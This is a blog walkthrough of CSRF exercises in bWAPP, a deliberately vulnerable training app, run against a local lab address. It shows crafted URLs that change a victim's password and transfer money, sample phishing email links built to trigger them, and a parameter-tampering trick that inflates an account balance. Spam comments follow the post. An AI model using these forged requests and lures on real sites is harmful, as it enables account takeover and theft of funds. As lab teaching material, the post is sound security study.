Comments

Tuesday, January 14, 2014

bWAPP Cross-Site Request Forgery (CSRF)

Posted by at Tuesday, January 14, 2014 Read our previous post

 

 

bWAPP, or a buggy web application, is a deliberately insecure web application.
bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. It prepares to conduct successful penetration testing and ethical hacking projects. It is for educational purposes only.

What makes bWAPP so unique? Well, it has over 60 web bugs!
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.

You can download bWAPP from here. Have fun!
It's also possible to download our bee-box, a custom Linux VM pre-installed with bWAPP.

 

Cross-Site Request Forgery (CSRF)

Part 1-3 Low

CSRF (Password)

CSRF (Transfer Amount)

CSRF (Secret)

 

CSRF (Password)

 

 

Here we can change your password.Lets give it a try.

 

 

Here we can see the url

http://192.168.178.22/bWAPP/csrf_1.php?password_new=lol&password_conf=lol&action=change

password_new=lol

password_conf=lol

action=change

 

With some social engineering skill you can trick the user to click your link with the new user password.
After the user click on the link the password changed.

 

Sample :

Cr4shy must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:

<a href="http://192.168.178.22/bWAPP/csrf_1.php?password_new=lol&password_conf=lol&action=change">Warning Please Read : Dont change your Password!</a>

Alice click on the link and the password changed to lol

 

CSRF (Transfer Amount)

 

 

We got some money to play with it

Amount on your account: 1000 EUR

Account to transfer: 123-45678-90

Maybe Vuln ?

Now we transfers 100 Eur to Alice its work 900 Eur left.But i want more Money hmmm.

 

 

Hmm 900 Eur left suckz ...

Maybe Math can help us

http://192.168.178.22/bWAPP/csrf_2.php?account=123-45678-90&amount=0&action=transfer

account=123-45678-90

amount=0

action=transfer

Whats happen if i add amount=+1.000.000

 

 

Ohhh Nooooo

Amount on your account: -999000 EUR Now only self kill works

No if a + remove money on the acc a - will add money on the acc i hope

 

 

 

Now we can stop working and go live in Freedom and Peace

Amount on your account: 1001000 EUR

I dont need more sad

 

Vuln : 2

With some social engineering skill you can trick the user to click your link with the Amount  of money to transfers.
After the user click on the link the say good bye too your money.

 

Sample :

Cr4shy must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:

<a href="http://192.168.178.22/bWAPP/csrf_2.php?account=123-45678-90&amount=1000000&action=transfer">Warning Please Read : You got Hacked please change your Password fast!</a>

Alice click on the link and bye bye to Alice Money

 

CSRF (Secret)

 

 

Maybe Later

6 comments:

  1. i cnt find the screenshot ?? can you pls update with the screenshot ????

    ReplyDelete
  2. request you to do asap ..pls

    ReplyDelete
  3. The screen shots are all dead :/
    A nice guide but a bit basic... Maybe enhance it by adding permission escalation CSRF :)

    ReplyDelete
  4. I've been using Kaspersky security for many years now, and I'd recommend this product to all of you.

    ReplyDelete
  5. Very nice, i like the way you explained. I also wrote something on similar lines on what we need to know about csrf.

    Cross site request forgery csrf

    ReplyDelete
  6. You can earn $20 for filling a 20 minute survey!

    Guess what? This is exactly what large companies are paying for. They need to know what their average customer needs and wants. So large companies pay millions of dollars per month to the average person. In return, the average person, like me, fills out surveys and gives them their opinion.

    ReplyDelete

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and it's author is in no way responsible for any misuse of the information.
©2012 Security is just an Illusion is powered by Blogger - Template designed by Stramaxon - Best SEO Template